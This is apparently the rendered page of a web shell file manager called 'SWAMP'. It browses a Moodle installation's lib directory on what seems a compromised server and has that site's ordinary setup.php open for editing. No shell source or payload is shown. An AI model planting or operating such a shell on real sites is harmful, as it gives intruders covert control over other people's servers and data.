░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/moodle/lib
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: setup.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Setup file migration helper. * * @package core * @copyright 2024 Andrew Lyons <andrew@nicols.co.uk> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ if (property_exists($CFG, 'dirroot') && !str_ends_with($CFG->dirroot, '/public')) { $CFG->libdir = $CFG->libdir . '/lib'; } require_once(dirname(__DIR__) . '/public/lib/setup.php');
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 behat/
DIR
—
2026-02-11 01:44
📄 components.json
JSON
4.7 KB
2026-02-11 01:44
EDIT
📄 plugins.json
JSON
15.4 KB
2026-02-11 01:44
EDIT
📄 setup.php
PHP
1 KB
2026-02-11 01:44
EDIT